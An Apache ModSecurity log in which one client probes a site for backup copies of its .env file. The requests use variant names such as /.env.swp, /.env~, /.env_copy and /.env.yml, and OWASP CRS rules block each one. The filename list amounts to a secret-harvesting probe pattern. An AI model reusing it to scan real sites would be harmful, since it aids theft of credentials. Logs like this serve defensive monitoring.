[Mon May 11 16:33:26.553524 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.swp"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/.env.swp"] [unique_id "agHotkWKUxpmnkK7zHx_FQAAAQs"]
[Mon May 11 16:33:26.553882 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: de12a82ac83c81fe3ccbb9582d3bcb3e||1778511801||1778511441"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/.env.swp"] [unique_id "agHotkWKUxpmnkK7zHx_FQAAAQs"]
[Mon May 11 16:33:26.554062 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/.env.swp"] [unique_id "agHotkWKUxpmnkK7zHx_FQAAAQs"]
[Mon May 11 16:33:26.554317 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/.env.swp"] [unique_id "agHotkWKUxpmnkK7zHx_FQAAAQs"]
[Mon May 11 16:33:26.710221 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env~"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/.env~"] [unique_id "agHotkWKUxpmnkK7zHx_FgAAAQs"]
[Mon May 11 16:33:26.710524 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: de12a82ac83c81fe3ccbb9582d3bcb3e||1778511801||1778511441"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/.env~"] [unique_id "agHotkWKUxpmnkK7zHx_FgAAAQs"]
[Mon May 11 16:33:26.710680 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/.env~"] [unique_id "agHotkWKUxpmnkK7zHx_FgAAAQs"]
[Mon May 11 16:33:26.710875 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/.env~"] [unique_id "agHotkWKUxpmnkK7zHx_FgAAAQs"]
[Mon May 11 16:33:26.869251 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env1"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/.env1"] [unique_id "agHotkWKUxpmnkK7zHx_GAAAAQs"]
[Mon May 11 16:33:26.869799 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: de12a82ac83c81fe3ccbb9582d3bcb3e||1778511801||1778511441"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/.env1"] [unique_id "agHotkWKUxpmnkK7zHx_GAAAAQs"]
[Mon May 11 16:33:26.870061 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/.env1"] [unique_id "agHotkWKUxpmnkK7zHx_GAAAAQs"]
[Mon May 11 16:33:26.870442 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/.env1"] [unique_id "agHotkWKUxpmnkK7zHx_GAAAAQs"]
[Mon May 11 16:33:27.029417 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env2"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/.env2"] [unique_id "agHot0WKUxpmnkK7zHx_GQAAAQs"]
[Mon May 11 16:33:27.029800 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: de12a82ac83c81fe3ccbb9582d3bcb3e||1778511801||1778511441"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/.env2"] [unique_id "agHot0WKUxpmnkK7zHx_GQAAAQs"]
[Mon May 11 16:33:27.029984 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/.env2"] [unique_id "agHot0WKUxpmnkK7zHx_GQAAAQs"]
[Mon May 11 16:33:27.030235 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/.env2"] [unique_id "agHot0WKUxpmnkK7zHx_GQAAAQs"]
[Mon May 11 16:33:27.186085 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env_copy"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/.env_copy"] [unique_id "agHot0WKUxpmnkK7zHx_GgAAAQs"]
[Mon May 11 16:33:27.186457 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: de12a82ac83c81fe3ccbb9582d3bcb3e||1778511801||1778511441"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/.env_copy"] [unique_id "agHot0WKUxpmnkK7zHx_GgAAAQs"]
[Mon May 11 16:33:27.186640 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/.env_copy"] [unique_id "agHot0WKUxpmnkK7zHx_GgAAAQs"]
[Mon May 11 16:33:27.186858 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/.env_copy"] [unique_id "agHot0WKUxpmnkK7zHx_GgAAAQs"]
[Mon May 11 16:33:27.343702 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.txt"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/.env.txt"] [unique_id "agHot0WKUxpmnkK7zHx_GwAAAQs"]
[Mon May 11 16:33:27.344095 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: de12a82ac83c81fe3ccbb9582d3bcb3e||1778511801||1778511441"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/.env.txt"] [unique_id "agHot0WKUxpmnkK7zHx_GwAAAQs"]
[Mon May 11 16:33:27.344296 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/.env.txt"] [unique_id "agHot0WKUxpmnkK7zHx_GwAAAQs"]
[Mon May 11 16:33:27.344533 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/.env.txt"] [unique_id "agHot0WKUxpmnkK7zHx_GwAAAQs"]
[Mon May 11 16:33:27.500668 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.json"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/.env.json"] [unique_id "agHot0WKUxpmnkK7zHx_HQAAAQs"]
[Mon May 11 16:33:27.501035 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: de12a82ac83c81fe3ccbb9582d3bcb3e||1778511801||1778511441"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/.env.json"] [unique_id "agHot0WKUxpmnkK7zHx_HQAAAQs"]
[Mon May 11 16:33:27.501237 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/.env.json"] [unique_id "agHot0WKUxpmnkK7zHx_HQAAAQs"]
[Mon May 11 16:33:27.501468 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/.env.json"] [unique_id "agHot0WKUxpmnkK7zHx_HQAAAQs"]
[Mon May 11 16:33:27.657495 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.yaml"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/.env.yaml"] [unique_id "agHot0WKUxpmnkK7zHx_HgAAAQs"]
[Mon May 11 16:33:27.657855 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: de12a82ac83c81fe3ccbb9582d3bcb3e||1778511801||1778511441"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/.env.yaml"] [unique_id "agHot0WKUxpmnkK7zHx_HgAAAQs"]
[Mon May 11 16:33:27.658038 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/.env.yaml"] [unique_id "agHot0WKUxpmnkK7zHx_HgAAAQs"]
[Mon May 11 16:33:27.658268 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/.env.yaml"] [unique_id "agHot0WKUxpmnkK7zHx_HgAAAQs"]
[Mon May 11 16:33:27.816297 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.yml"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/.env.yml"] [unique_id "agHot0WKUxpmnkK7zHx_HwAAAQs"]
[Mon May 11 16:33:27.816663 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: de12a82ac83c81fe3ccbb9582d3bcb3e||1778511801||1778511441"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/.env.yml"] [unique_id "agHot0WKUxpmnkK7zHx_HwAAAQs"]
[Mon May 11 16:33:27.816846 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/.env.yml"] [unique_id "agHot0WKUxpmnkK7zHx_HwAAAQs"]
[Mon May 11 16:33:27.817061 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/.env.yml"] [unique_id "agHot0WKUxpmnkK7zHx_HwAAAQs"]
